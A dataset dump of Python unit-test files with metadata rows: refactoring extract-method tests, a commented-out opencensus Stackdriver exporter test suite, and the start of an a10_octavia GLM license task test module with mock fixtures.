' def func2(self):\n b = self.one()\n\n' \
' def one(self):\n return 1\n'
self.assertEquals(expected, refactored)
def test_extract_variable_with_no_new_lines_at_the_end(self):
code = 'a_var = 10'
start = code.index('10')
end = start + 2
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'new_var = 10\na_var = new_var'
self.assertEquals(expected, refactored)
def test_extract_method_containing_return_in_functions(self):
code = 'def f(arg):\n return arg\nprint(f(1))\n'
start, end = self._convert_line_range_to_offset(code, 1, 3)
refactored = self.do_extract_method(code, start, end, 'a_func')
expected = '\ndef a_func():\n def f(arg):\n return arg\n' \
' print(f(1))\n\na_func()\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_varying_first_parameter(self):
code = 'class C(object):\n' \
' def f1(self):\n print(str(self))\n' \
' def f2(self):\n print(str(1))\n'
start = code.index('print(') + 6
end = code.index('))\n') + 1
refactored = self.do_extract_method(code, start, end,
'to_str', similar=True)
expected = 'class C(object):\n' \
' def f1(self):\n print(self.to_str())\n\n' \
' def to_str(self):\n return str(self)\n' \
' def f2(self):\n print(str(1))\n'
self.assertEquals(expected, refactored)
def test_extract_method_when_an_attribute_exists_in_function_scope(self):
code = 'class A(object):\n def func(self):\n pass\n' \
'a = A()\n' \
'def f():\n' \
' func = a.func()\n' \
' print func\n'
start, end = self._convert_line_range_to_offset(code, 6, 6)
refactored = self.do_extract_method(code, start, end, 'g')
refactored = refactored[refactored.index('A()') + 4:]
expected = 'def f():\n func = g()\n print func\n\n' \
'def g():\n func = a.func()\n return func\n'
self.assertEquals(expected, refactored)
def test_global_option_for_extract_method(self):
code = 'def a_func():\n print(1)\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end,
'extracted', global_=True)
expected = 'def a_func():\n extracted()\n\n' \
'def extracted():\n print(1)\n'
self.assertEquals(expected, refactored)
def test_global_extract_method(self):
code = 'class AClass(object):\n\n' \
' def a_func(self):\n print(1)\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end,
'new_func', global_=True)
expected = 'class AClass(object):\n\n' \
' def a_func(self):\n new_func()\n\n' \
'def new_func():\n print(1)\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_multiple_methods(self): # noqa
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' print(1)\n\n' \
' def another_func(self):\n' \
' pass\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end,
'new_func', global_=True)
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' new_func()\n\n' \
' def another_func(self):\n' \
' pass\n\n' \
'def new_func():\n' \
' print(1)\n'
self.assertEquals(expected, refactored)
def test_where_to_seach_when_extracting_global_names(self):
code = 'def a():\n return 1\ndef b():\n return 1\nb = 1\n'
start = code.index('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end, 'one',
similar=True, global_=True)
expected = 'def a():\n return one\none = 1\n' \
'def b():\n return one\nb = one\n'
self.assertEquals(expected, refactored)
def test_extracting_pieces_with_distinct_temp_names(self):
code = 'a = 1\nprint a\nb = 1\nprint b\n'
start = code.index('a')
end = code.index('\nb')
refactored = self.do_extract_method(code, start, end, 'f',
similar=True, global_=True)
expected = '\ndef f():\n a = 1\n print a\n\nf()\nf()\n'
self.assertEquals(expected, refactored)
def test_extract_methods_in_glob_funcs_should_be_glob(self):
code = 'def f():\n a = 1\ndef g():\n b = 1\n'
start = code.rindex('1')
refactored = self.do_extract_method(code, start, start + 1, 'one',
similar=True, global_=False)
expected = 'def f():\n a = one()\ndef g():\n b = one()\n\n' \
'def one():\n return 1\n'
self.assertEquals(expected, refactored)
def test_extract_methods_in_glob_funcs_should_be_glob_2(self):
code = 'if 1:\n var = 2\n'
start = code.rindex('2')
refactored = self.do_extract_method(code, start, start + 1, 'two',
similar=True, global_=False)
expected = '\ndef two():\n return 2\n\nif 1:\n var = two()\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_try_blocks(self):
code = 'def f():\n try:\n pass\n' \
' except Exception:\n pass\n'
start, end = self._convert_line_range_to_offset(code, 2, 5)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f():\n g()\n\ndef g():\n try:\n pass\n' \
' except Exception:\n pass\n'
self.assertEquals(expected, refactored)
def test_extract_and_not_passing_global_functions(self):
code = 'def next(p):\n return p + 1\nvar = next(1)\n'
start = code.rindex('next')
refactored = self.do_extract_method(code, start, len(code) - 1, 'two')
expected = 'def next(p):\n return p + 1\n' \
'\ndef two():\n return next(1)\n\nvar = two()\n'
self.assertEquals(expected, refactored)
def test_extracting_with_only_one_return(self):
code = 'def f():\n var = 1\n return var\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f():\n return g()\n\n' \
'def g():\n var = 1\n return var\n'
self.assertEquals(expected, refactored)
def test_extracting_variable_and_implicit_continuations(self):
code = 's = ("1"\n "2")\n'
start = code.index('"')
end = code.rindex('"') + 1
refactored = self.do_extract_variable(code, start, end, 's2')
expected = 's2 = "1" "2"\ns = (s2)\n'
self.assertEquals(expected, refactored)
def test_extracting_method_and_implicit_continuations(self):
code = 's = ("1"\n "2")\n'
start = code.index('"')
end = code.rindex('"') + 1
refactored = self.do_extract_method(code, start, end, 'f')
expected = '\ndef f():\n return "1" "2"\n\ns = (f())\n'
self.assertEquals(expected, refactored)
def test_passing_conditional_updated_vars_in_extracted(self):
code = 'def f(a):\n' \
' if 0:\n' \
' a = 1\n' \
' print(a)\n'
start, end = self._convert_line_range_to_offset(code, 2, 4)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f(a):\n' \
' g(a)\n\n' \
'def g(a):\n' \
' if 0:\n' \
' a = 1\n' \
' print(a)\n'
self.assertEquals(expected, refactored)
def test_returning_conditional_updated_vars_in_extracted(self):
code = 'def f(a):\n' \
' if 0:\n' \
' a = 1\n' \
' print(a)\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'g')
expected = 'def f(a):\n' \
' a = g(a)\n' \
' print(a)\n\n' \
'def g(a):\n' \
' if 0:\n' \
' a = 1\n' \
' return a\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_variables_possibly_written_to(self):
code = "def a_func(b):\n" \
" if b > 0:\n" \
" a = 2\n" \
" print a\n"
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func(b):\n" \
" a = extracted(b)\n" \
" print a\n\n" \
"def extracted(b):\n" \
" if b > 0:\n" \
" a = 2\n" \
" return a\n"
self.assertEquals(expected, refactored)
if __name__ == '__main__':
unittest.main()
| 47.907055 | 79 | 0.545639 | 5,542 | 42,781 | 3.99188 | 0.046193 | 0.043394 | 0.051123 | 0.076934 | 0.871536 | 0.841568 | 0.824165 | 0.803914 | 0.759255 | 0.727162 | 0 | 0.018629 | 0.322433 | 42,781 | 892 | 80 | 47.960762 | 0.744575 | 0.002688 | 0 | 0.530895 | 0 | 0.002522 | 0.273358 | 0.009587 | 0 | 0 | 0 | 0.001121 | 0.10971 | 1 | 0.116015 | false | 0.02396 | 0.008827 | 0 | 0.129887 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16b50447e845d584960b1dc23a6adab06dd4366c | 31,253 | py | Python | contrib/opencensus-ext-stackdriver/tests/test_stackdriver_exporter.py | marianhromiak/opencensus-python | c2bd5b0c9b78d91de1a3108ddc376013b3ae6824 | [
"Apache-2.0"
] | null | null | null | contrib/opencensus-ext-stackdriver/tests/test_stackdriver_exporter.py | marianhromiak/opencensus-python | c2bd5b0c9b78d91de1a3108ddc376013b3ae6824 | [
"Apache-2.0"
] | 1 | 2019-05-20T05:17:32.000Z | 2019-05-20T23:21:48.000Z | contrib/opencensus-ext-stackdriver/tests/test_stackdriver_exporter.py | marianhromiak/opencensus-python | c2bd5b0c9b78d91de1a3108ddc376013b3ae6824 | [
"Apache-2.0"
] | 1 | 2019-05-23T17:26:57.000Z | 2019-05-23T17:26:57.000Z | # # Copyright 2017, OpenCensus Authors
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# import unittest
# import mock
# from opencensus.common.version import __version__
# from opencensus.ext.stackdriver import trace_exporter
# from opencensus.trace import span_context
# from opencensus.trace import span_data as span_data_module
# class _Client(object):
# def __init__(self, project=None):
# if project is None:
# project = 'PROJECT'
# self.project = project
# class TestStackdriverExporter(unittest.TestCase):
# def test_constructor_default(self):
# patch = mock.patch(
# 'opencensus.ext.stackdriver.trace_exporter.Client',
# new=_Client)
# with patch:
# exporter = trace_exporter.StackdriverExporter()
# project_id = 'PROJECT'
# self.assertEqual(exporter.project_id, project_id)
# def test_constructor_explicit(self):
# client = mock.Mock()
# project_id = 'PROJECT'
# client.project = project_id
# transport = mock.Mock()
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id, transport=transport)
# self.assertIs(exporter.client, client)
# self.assertEqual(exporter.project_id, project_id)
# def test_export(self):
# client = mock.Mock()
# project_id = 'PROJECT'
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id, transport=MockTransport)
# exporter.export({})
# self.assertTrue(exporter.transport.export_called)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance',
# return_value=None)
# def test_emit(self, mr_mock):
# trace_id = '6e0c63257de34c92bf9efcd03927272e'
# span_datas = [
# span_data_module.SpanData(
# name='span',
# context=span_context.SpanContext(trace_id=trace_id),
# span_id='1111',
# parent_span_id=None,
# attributes=None,
# start_time=None,
# end_time=None,
# child_span_count=None,
# stack_trace=None,
# annotations=None,
# message_events=None,
# links=None,
# status=None,
# same_process_as_parent_span=None,
# span_kind=0,
# )
# ]
# stackdriver_spans = {
# 'spans': [{
# 'status':
# None,
# 'childSpanCount':
# None,
# 'links':
# None,
# 'startTime':
# None,
# 'spanId':
# '1111',
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count':
# 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# }
# }
# },
# 'stackTrace':
# None,
# 'displayName': {
# 'truncated_byte_count': 0,
# 'value': 'span'
# },
# 'name':
# 'projects/PROJECT/traces/{}/spans/1111'.format(trace_id),
# 'timeEvents':
# None,
# 'endTime':
# None,
# 'sameProcessAsParentSpan':
# None
# }]
# }
# client = mock.Mock()
# project_id = 'PROJECT'
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# exporter.emit(span_datas)
# name = 'projects/{}'.format(project_id)
# client.batch_write_spans.assert_called_with(name, stackdriver_spans)
# self.assertTrue(client.batch_write_spans.called)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance',
# return_value=None)
# def test_translate_to_stackdriver(self, mr_mock):
# project_id = 'PROJECT'
# trace_id = '6e0c63257de34c92bf9efcd03927272e'
# span_name = 'test span'
# span_id = '6e0c63257de34c92'
# attributes = {
# 'attributeMap': {
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# 'key_double': {
# 'double_value': {
# 'value': 123.45
# }
# },
# 'http.host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# }
# }
# }
# parent_span_id = '6e0c63257de34c93'
# start_time = 'test start time'
# end_time = 'test end time'
# trace = {
# 'spans': [{
# 'displayName': {
# 'value': span_name,
# 'truncated_byte_count': 0
# },
# 'spanId':
# span_id,
# 'startTime':
# start_time,
# 'endTime':
# end_time,
# 'parentSpanId':
# parent_span_id,
# 'attributes':
# attributes,
# 'someRandomKey':
# 'this should not be included in result',
# 'childSpanCount':
# 0
# }],
# 'traceId':
# trace_id
# }
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# spans = list(exporter.translate_to_stackdriver(trace))
# expected_traces = [{
# 'name': 'projects/{}/traces/{}/spans/{}'.format(
# project_id, trace_id, span_id),
# 'displayName': {
# 'value': span_name,
# 'truncated_byte_count': 0
# },
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# 'key_double': {
# 'double_value': {
# 'value': 123.45
# }
# },
# '/http/host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# }
# }
# },
# 'spanId': str(span_id),
# 'startTime': start_time,
# 'endTime': end_time,
# 'parentSpanId': str(parent_span_id),
# 'status': None,
# 'links': None,
# 'stackTrace': None,
# 'timeEvents': None,
# 'childSpanCount': 0,
# 'sameProcessAsParentSpan': None
# }]
# self.assertEqual(spans, expected_traces)
# def test_translate_common_attributes_to_stackdriver_no_map(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# attributes = {'outer key': 'some value'}
# expected_attributes = {'outer key': 'some value'}
# exporter.map_attributes(attributes)
# self.assertEqual(attributes, expected_attributes)
# def test_translate_common_attributes_to_stackdriver_none(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# # does not throw
# self.assertIsNone(exporter.map_attributes(None))
# def test_translate_common_attributes_to_stackdriver(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# 'component': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http'
# }
# },
# 'error.message': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error message'
# }
# },
# 'error.name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error name'
# }
# },
# 'http.host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# },
# 'http.method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'GET'
# }
# },
# 'http.status_code': {
# 'int_value': {
# 'value': 200
# }
# },
# 'http.url': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http://host:port/path?query'
# }
# },
# 'http.user_agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'some user agent'
# }
# },
# 'http.client_city': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'Redmond'
# }
# },
# 'http.client_country': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'USA'
# }
# },
# 'http.client_protocol': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'HTTP 1.1'
# }
# },
# 'http.client_region': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'WA'
# }
# },
# 'http.request_size': {
# 'int_value': {
# 'value': 100
# }
# },
# 'http.response_size': {
# 'int_value': {
# 'value': 10
# }
# },
# 'pid': {
# 'int_value': {
# 'value': 123456789
# }
# },
# 'tid': {
# 'int_value': {
# 'value': 987654321
# }
# },
# 'stacktrace': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'at unknown'
# }
# },
# 'grpc.host_port': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'localhost:50051'
# }
# },
# 'grpc.method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'post'
# }
# }
# }
# }
# expected_attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# 'key': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'value'
# }
# },
# '/component': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http'
# }
# },
# '/error/message': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error message'
# }
# },
# '/error/name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'error name'
# }
# },
# '/http/host': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'host'
# }
# },
# '/http/method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'GET'
# }
# },
# '/http/status_code': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '200'
# }
# },
# '/http/url': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'http://host:port/path?query'
# }
# },
# '/http/user_agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'some user agent'
# }
# },
# '/http/client_city': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'Redmond'
# }
# },
# '/http/client_country': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'USA'
# }
# },
# '/http/client_protocol': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'HTTP 1.1'
# }
# },
# '/http/client_region': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'WA'
# }
# },
# '/http/request/size': {
# 'int_value': {
# 'value': 100
# }
# },
# '/http/response/size': {
# 'int_value': {
# 'value': 10
# }
# },
# '/pid': {
# 'int_value': {
# 'value': 123456789
# }
# },
# '/tid': {
# 'int_value': {
# 'value': 987654321
# }
# },
# '/stacktrace': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'at unknown'
# }
# },
# '/grpc/host_port': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'localhost:50051'
# }
# },
# '/grpc/method': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'post'
# }
# }
# }
# }
# exporter.map_attributes(attributes)
# self.assertEqual(attributes, expected_attributes)
# def test_translate_common_attributes_status_code(self):
# project_id = 'PROJECT'
# client = mock.Mock()
# client.project = project_id
# exporter = trace_exporter.StackdriverExporter(
# client=client, project_id=project_id)
# attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# 'http.status_code': {
# 'int_value': 200
# }
# }
# }
# expected_attributes = {
# 'outer key': 'some value',
# 'attributeMap': {
# '/http/status_code': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '200'
# }
# }
# }
# }
# exporter.map_attributes(attributes)
# self.assertEqual(attributes, expected_attributes)
# class Test_set_attributes_gae(unittest.TestCase):
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance',
# return_value=None)
# def test_set_attributes_gae(self, mr_mock):
# import os
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/gae/app/module': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'service'
# }
# },
# 'g.co/gae/app/instance': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'flex'
# }
# },
# 'g.co/gae/app/version': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'version'
# }
# },
# 'g.co/gae/app/project': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'project'
# }
# },
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# }
# }
# }
# with mock.patch.dict(
# os.environ, {
# trace_exporter._APPENGINE_FLEXIBLE_ENV_VM: 'vm',
# trace_exporter._APPENGINE_FLEXIBLE_ENV_FLEX: 'flex',
# 'GOOGLE_CLOUD_PROJECT': 'project',
# 'GAE_SERVICE': 'service',
# 'GAE_VERSION': 'version'
# }):
# self.assertTrue(trace_exporter.is_gae_environment())
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# class TestMonitoredResourceAttributes(unittest.TestCase):
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_gke(self, gmr_mock):
# import os
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/gae/app/module': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'service'
# }
# },
# 'g.co/gae/app/instance': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'flex'
# }
# },
# 'g.co/gae/app/version': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'version'
# }
# },
# 'g.co/gae/app/project': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'project'
# }
# },
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'g.co/r/k8s_container/project_id': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'my_project'
# }
# },
# 'g.co/r/k8s_container/location': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'zone1'
# }
# },
# 'g.co/r/k8s_container/namespace_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'namespace'
# }
# },
# 'g.co/r/k8s_container/pod_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'pod'
# }
# },
# 'g.co/r/k8s_container/cluster_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'cluster'
# }
# },
# 'g.co/r/k8s_container/container_name': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'c1'
# }
# },
# }
# }
# }
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = 'k8s_container'
# mock_resource.get_labels.return_value = {
# 'k8s.io/pod/name': 'pod',
# 'k8s.io/cluster/name': 'cluster',
# 'k8s.io/namespace/name': 'namespace',
# 'k8s.io/container/name': 'c1',
# 'project_id': 'my_project',
# 'zone': 'zone1'
# }
# gmr_mock.return_value = mock_resource
# with mock.patch.dict(
# os.environ, {
# trace_exporter._APPENGINE_FLEXIBLE_ENV_VM: 'vm',
# trace_exporter._APPENGINE_FLEXIBLE_ENV_FLEX: 'flex',
# 'GOOGLE_CLOUD_PROJECT': 'project',
# 'GAE_SERVICE': 'service',
# 'GAE_VERSION': 'version'
# }):
# self.assertTrue(trace_exporter.is_gae_environment())
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_gce(self, gmr_mock):
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'g.co/r/gce_instance/project_id': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'my_project'
# }
# },
# 'g.co/r/gce_instance/instance_id': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '12345'
# }
# },
# 'g.co/r/gce_instance/zone': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'zone1'
# }
# },
# }
# }
# }
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = 'gce_instance'
# mock_resource.get_labels.return_value = {
# 'project_id': 'my_project',
# 'instance_id': '12345',
# 'zone': 'zone1'
# }
# gmr_mock.return_value = mock_resource
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_aws(self, amr_mock):
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# },
# 'g.co/r/aws_ec2_instance/aws_account': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '123456789012'
# }
# },
# 'g.co/r/aws_ec2_instance/region': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'aws:us-west-2'
# }
# },
# }
# }
# }
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = 'aws_ec2_instance'
# mock_resource.get_labels.return_value = {
# 'aws_account': '123456789012',
# 'region': 'us-west-2'
# }
# amr_mock.return_value = mock_resource
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_None(self, mr_mock):
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# }
# }
# }
# }
# mr_mock.return_value = None
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = mock.Mock()
# mock_resource.get_labels.return_value = mock.Mock()
# mr_mock.return_value = mock_resource
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# class MockTransport(object):
# def __init__(self, exporter=None):
# self.export_called = False
# self.exporter = exporter
# def export(self, trace):
# self.export_called = True
| 35.922989 | 78 | 0.377532 | 2,082 | 31,253 | 5.380884 | 0.122478 | 0.075426 | 0.104436 | 0.110238 | 0.746675 | 0.723378 | 0.711684 | 0.686691 | 0.646434 | 0.617602 | 0 | 0.018921 | 0.502832 | 31,253 | 869 | 79 | 35.964327 | 0.702085 | 0.946021 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16d598357610ff4251a1f2b8f94d3a13fbcd182e | 23,671 | py | Python | a10_octavia/tests/unit/controller/worker/tasks/test_glm_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 5 | 2020-03-10T16:48:55.000Z | 2021-09-18T00:57:58.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_glm_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 72 | 2019-08-10T01:16:59.000Z | 2021-12-13T08:20:36.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_glm_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 27 | 2019-08-11T19:26:52.000Z | 2021-07-21T09:08:58.000Z | # Copyright 2021, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import imp
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from octavia.common import data_models as o_data_models
from octavia.network import data_models as n_data_models
from octavia.tests.common import constants as t_constants
from a10_octavia.common import config_options
from a10_octavia.common import data_models as a10_data_models
from a10_octavia.common import exceptions as a10_ex
from a10_octavia.controller.worker.tasks import glm_tasks as task
from a10_octavia.tests.common import a10constants
from a10_octavia.tests.unit import base
VTHUNDER = a10_data_models.VThunder(id=a10constants.MOCK_VTHUNDER_ID)
AMPHORA = o_data_models.Amphora(id=t_constants.MOCK_AMP_ID1)
DNS_SUBNET = n_data_models.Subnet(id=a10constants.MOCK_SUBNET_ID)
DNS_NETWORK = n_data_models.Network(id=a10constants.MOCK_NETWORK_ID,
subnets=[DNS_SUBNET.id])
PRIMARY_DNS = '1.3.3.7'
SECONDARY_DNS = '1.0.0.7'
PROXY_HOST = '10.10.10.10'
PROXY_PORT = 1111
PROXY_USERNAME = 'user'
PROXY_PASSWORD = True
PROXY_PASSWORD_VALUE = 'password'
class TestGLMTasks(base.BaseTaskTestCase):
def setUp(self):
super(TestGLMTasks, self).setUp()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.register_opts(config_options.A10_GLM_LICENSE_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
imp.reload(task)
self.client_mock = mock.Mock()
self.db_session = mock.patch(
'a10_octavia.controller.worker.tasks.a10_database_tasks.db_apis.get_session')
self.db_session.start()
def tearDown(self):
super(TestGLMTasks, self).tearDown()
self.conf.reset()
def test_DNSConfiguration_execute_no_vthunder_warn(self):
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
